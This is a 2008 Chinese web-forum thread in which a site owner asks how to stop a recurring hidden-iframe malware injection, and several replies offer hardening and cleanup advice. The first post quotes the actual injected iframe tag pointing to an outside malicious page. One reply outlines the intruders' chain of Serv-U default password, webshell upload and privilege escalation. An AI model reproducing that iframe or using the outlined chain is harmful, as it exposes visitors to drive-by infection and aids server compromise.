最近网站中木马了，请教如何防iframe挂马急！！(200分)

C

cui1688

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-11-02

• #1

[red][/red]最近发现网站挂了木马：<ifRame src=http://www.Jznylsf.cn/one/a26.htm wIdth=50 HeigHt=0 name=7303 boRdeR=0></ifRame>
我用的是虚拟主机，上传覆盖一遍，第二天发现又有了，好多天了，总是去不掉，找到网上防止木马的例子都不起作用，请教高手有没有好的解决办法？

 

M

man8888

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-11-02

• #2

网页频繁被修改可能你的网站的服务器没打好补丁，没停掉无关的服务，比如Remote Registry服务等，服务器优化是专门的学问，建议招聘专职网管，他们比你专业的多。

 

C

creation-zy

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-11-02

• #3

可以考虑专门另外找个目录，将没问题的网页放到那里，然后做一个xcopy的bat，并在计
划任务中定期的执行之，对实际工作的Web目录进行覆盖。（俺们公司的防窜改就是将副本
放到另一个服务器上，利用ftp进行覆盖的）
当然，打补丁、关闭无关进程、杜绝家贼才是最要紧的。

 

Q

QQ在线

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-11-03

• #4

我做网管作法是：设置目录/文件读写权限。
1：NEW一个目录，开始设置权限：admin:r/w/all, everyone:r
2: upload my web,权限不改（继承）
3：修改一些目录权限可写，如上传图片，文件的目录，或数据库文件：可写，并在IIS中将权限设置可写
4: 设置IIS整个网站的root为只读（默认是可读/写），需要写的目录再分配写
5: 新增时，需要写权限的再分配，否则为只读。

基本作法就这样。

一般挂马基本就是找网站漏洞，再上传修改，但一般Windows系统用户不会侵入，所以这样弄后，基本挂马情况会少很多。

 

Q

QQ在线

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-11-03

• #5

另，楼主将那个挂马的地址，改成：http://www.xxx.com/xxxxx

小心给别人不小心点到中招

 

C

cqwty

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-11-03

• #6

挂马这个东西，不要什么专业网管，而且本身也不是什么专业的，我也遇到过同样的情况，处理的方法有以下几个：
第一，检查你这个服务器上的所有的网站源代码，把这些东西去掉；
第二，检查你这个网站下面的所有文件，把别人挂马之前丢进来的webshell提权的文件删除，这个文件一般都是加密的，打开是乱码。
第三，检查你的服务器是不是开了serv-u的ftp，因为serv-u有一个默认的密码，这个密码容易被利用，那些挂马的，第一步就是找这个，找到这个，然后就是默认密码上传工具，然后上传提权文件，最后提权，控制你的服务器。
第四，检查一下你的服务器上各个盘上的文件，对那些可疑的，exe文件进行备份，然后清除。当然，你要确保没有用的哈。
如果你做到以上几步了，基本就搞定了。

 

冷

冷风无泪

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-11-03

• #7

建议试一下用安全伞来批量检测网页是否被挂马了，比手工方便很多！~~